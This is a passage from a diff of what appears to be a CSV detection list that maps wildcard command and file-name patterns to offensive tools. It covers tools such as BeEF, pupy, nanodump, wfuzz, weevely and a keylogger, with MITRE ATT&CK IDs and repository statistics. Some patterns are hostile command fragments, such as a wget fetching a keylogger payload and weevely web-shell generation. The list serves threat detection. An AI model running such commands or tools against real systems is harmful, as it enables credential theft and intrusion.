"*weakpass.com/generate*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*weakpass/crack-js*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*weakpass-main.*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" -"*web_cloner/interceptor*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*web_cloner/interceptor*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*WebBrowserPassView.exe*","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*WebBrowserPassView.zip*","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*webcamsnap -v*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*webcamsnap -v*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*webclientservicescanner -dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*WebDavC2*","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","116","72","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" "*webdavC2.py*","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","116","72","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" @@ -18163,42 +18349,42 @@ "*webshell-exegol.php*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*weevely generate *.php*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*weevely https://*.php * id*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*Welcome to OpenBullet 2*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1329","424","2023-09-25T22:57:36Z","2020-04-23T14:04:16Z" +"*Welcome to OpenBullet 2*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1329","425","2023-10-04T18:54:15Z","2020-04-23T14:04:16Z" "*wePWNise*","offensive_tool_keyword","wePWNise","wePWNise is proof-of-concept Python script which generates VBA code that can be used in Office macros or templates. It was designed with automation and integration in mind. targeting locked down environment scenarios. The tool enumerates Software Restriction Policies (SRPs) and EMET mitigations and dynamically identifies safe binaries to inject payloads into. wePWNise integrates with existing exploitation frameworks (e.g. Metasploit. Cobalt Strike) and it also accepts any custom payload in raw format.","T1203 - T1059 - T1564.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/FSecureLABS/wePWNise","1","0","N/A","N/A","4","351","107","2018-08-27T22:00:25Z","2016-11-09T11:01:11Z" -"*werdhaihai/AtlasReaper*","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","202","21","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" +"*werdhaihai/AtlasReaper*","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","203","21","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" "*werfault_shtinkering*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*werfault_silent_process_exit*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*WerTrigger.exe*","offensive_tool_keyword","WerTrigger","Weaponizing for privileged file writes bugs with windows problem reporting","T1059.003 - T1055.001 - T1127.001 - T1546.008","TA0002 - TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/sailay1996/WerTrigger","1","1","N/A","9","2","147","34","2022-05-10T17:36:49Z","2020-05-20T11:27:56Z" "*WerTrigger-master*","offensive_tool_keyword","WerTrigger","Weaponizing for privileged file writes bugs with windows problem reporting","T1059.003 - T1055.001 - T1127.001 - T1546.008","TA0002 - TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/sailay1996/WerTrigger","1","1","N/A","9","2","147","34","2022-05-10T17:36:49Z","2020-05-20T11:27:56Z" "*wevtutil qe security /format:text /q:*Event[System[(EventID=4624)]*find *Source Network Address*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*wfencode -*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*wfencode -e *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*wfencode.bat*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*wfencode.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*wfpayload -*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*wfpayload.bat*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*wfpayload.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfencode -*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfencode -e *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfencode.bat*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfencode.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfpayload -*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfpayload.bat*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfpayload.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*WfpEscalation.exe*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*WfpTokenDup.exe -*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" "*wfuzz --*.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*wfuzz.bat*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*wfuzz.get_payload*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*wfuzz.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*wfuzz.wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfuzz.bat*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfuzz.get_payload*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfuzz.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfuzz.wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*wfuzz/wordlist*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*wfuzz-cli.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*wfuzzp.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfuzz-cli.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*wfuzzp.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*wgen.py*","offensive_tool_keyword","Python-Wordlist-Generator","Create awesome wordlists with Python.","T1110 - T1588 - T1602","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/agusmakmun/Python-Wordlist-Generator","1","0","N/A","N/A","1","96","37","2019-06-12T13:23:17Z","2015-05-22T12:32:01Z" "*wget *http-vuln-cve2020-5902.nse*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wget* -O les.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*wget*.interact.sh*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C2","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" -"*wget*/drapl0n/DuckyLogger/blob/main/xinput\?raw=true*","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*wget*.interact.sh*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C2","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*wget*/drapl0n/DuckyLogger/blob/main/xinput\?raw=true*","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" "*Wh04m1001/DFSCoerce*","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","10","7","635","78","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z" "*wh0amitz/BypassCredGuard*","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1558 - T1558.001 - T1055 - T1055.002","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","10","3","277","50","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" -"*wh0amitz/S4UTomato*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","315","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*wh0amitz/S4UTomato*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*Wh1t3Fox/polenum*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*WhatBreach*","offensive_tool_keyword","WhatBreach","WhatBreach is an OSINT tool that simplifies the task of discovering what breaches an email address has been discovered in. WhatBreach provides a simple and effective way to search either multiple. or a single email address and discover all known breaches that this email has been seen in. From there WhatBreach is capable of downloading the database if it is publicly available. downloading the pastes the email was seen in. or searching the domain of the email for further investigation. To perform this task successfully WhatBreach takes advantage of the following websites and/or APIs:","T1593.001 - T1593.002 - T1593.003","TA0010 - TA0011 - ","N/A","N/A","Information Gathering","https://github.com/Ekultek/WhatBreach","1","0","N/A","N/A","10","945","152","2023-05-22T21:57:04Z","2019-04-19T20:40:19Z" +"*WhatBreach*","offensive_tool_keyword","WhatBreach","WhatBreach is an OSINT tool that simplifies the task of discovering what breaches an email address has been discovered in. WhatBreach provides a simple and effective way to search either multiple. or a single email address and discover all known breaches that this email has been seen in. From there WhatBreach is capable of downloading the database if it is publicly available. downloading the pastes the email was seen in. or searching the domain of the email for further investigation. To perform this task successfully WhatBreach takes advantage of the following websites and/or APIs:","T1593.001 - T1593.002 - T1593.003","TA0010 - TA0011 - ","N/A","N/A","Information Gathering","https://github.com/Ekultek/WhatBreach","1","0","N/A","N/A","10","946","152","2023-05-22T21:57:04Z","2019-04-19T20:40:19Z" "*whatlicense-main.zip*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","1","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" "*whereami.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","1","N/A","10","10","152","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" "*whereami.x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 